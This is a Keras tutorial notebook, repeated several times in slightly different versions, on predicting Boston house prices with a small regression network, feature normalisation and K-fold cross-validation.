As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
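###Markdown
The index bookkeeping of the loop above can also be delegated to scikit-learn's `KFold`; a rough equivalent sketch, assuming scikit-learn is installed (the default `shuffle=False` matches the contiguous partitions used above):
###Code
from sklearn.model_selection import KFold

kf = KFold(n_splits=4)
all_scores = []
for train_idx, val_idx in kf.split(train_data):
    # Build and train a fresh model on the k-1 training partitions.
    model = build_model()
    model.fit(train_data[train_idx], train_targets[train_idx],
              epochs=100, batch_size=1, verbose=0)
    # Evaluate on the held-out partition and keep the MAE.
    val_mse, val_mae = model.evaluate(train_data[val_idx], train_targets[val_idx], verbose=0)
    all_scores.append(val_mae)
np.mean(all_scores)
###Output
_____no_output_____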
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
processing fold # 0
processing fold # 1
processing fold # 2
processing fold # 3
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
We can also compute the average using the *numpy.mean* function over axis=0:
We can also compute the average using the *numpy.mean* function over axis=0:
###Code
average_mae_history = np.mean(all_mae_histories, axis=0)
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
%matplotlib inline
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
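###Markdown
Instead of reading the best epoch count off the plot by hand, an `EarlyStopping` callback can halt training automatically once validation MAE stops improving. A hedged sketch (the monitored key is `val_mean_absolute_error` here, but its exact name depends on the Keras version):
###Code
from keras.callbacks import EarlyStopping

model = build_model()
# Hold out 20% of the training data for validation and stop once validation MAE
# has not improved for 10 consecutive epochs.
early_stop = EarlyStopping(monitor='val_mean_absolute_error', patience=10)
model.fit(train_data, train_targets,
          validation_split=0.2,
          epochs=500, batch_size=16, verbose=0,
          callbacks=[early_stop])
###Output
_____no_output_____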
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from tensorflow.keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
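###Markdown
A quick check that the standardization behaved as described: the training features should now have mean roughly 0 and standard deviation roughly 1, while the test features will only be approximately so, because they were scaled with the training statistics:
###Code
# Per-feature mean and standard deviation after normalization.
print(train_data.mean(axis=0).round(6), train_data.std(axis=0).round(6))
print(test_data.mean(axis=0).round(2), test_data.std(axis=0).round(2))
###Output
_____no_output_____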
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from tensorflow.keras import models
from tensorflow.keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
In a regression problem, we do not use an activation function such as sigmoid. Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward: Because the dataset is not large enough, let's use K-fold validation to improve the accuracy of our evaluation.
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \\$2,400 on average, which is still significant considering that the prices range from \\$10,000 to \\$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from tensorflow.keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mae']
all_mae_histories.append(mae_history)
history.history.keys()
###Output
_____no_output_____
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
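###Markdown
If the trained model needs to be reused later, it can be saved to disk and restored; a small sketch, assuming h5py is available (the filename is just an example):
###Code
from tensorflow.keras.models import load_model

# Persist the trained model, then reload it into a new object and re-evaluate it.
model.save('boston_housing_model.h5')
restored_model = load_model('boston_housing_model.h5')
restored_model.evaluate(test_data, test_targets, verbose=0)
###Output
_____no_output_____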
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
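###Markdown
To put a number on the fold-to-fold variance discussed above, the spread of the per-fold scores can be reported alongside their mean; a small illustrative addition:
###Code
# Mean and standard deviation of the k validation MAE scores.
print(np.mean(all_scores), np.std(all_scores))
###Output
_____no_output_____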
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
processing fold # 0
processing fold # 1
processing fold # 2
processing fold # 3
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
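###Markdown
The epoch with the lowest averaged validation MAE can also be read off programmatically rather than eyeballed from the plot; a small check using the unsmoothed averages:
###Code
# +1 because epochs are conventionally counted from 1, not 0.
best_epoch = np.argmin(average_mae_history) + 1
print(best_epoch)
###Output
_____no_output_____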
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
    # the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
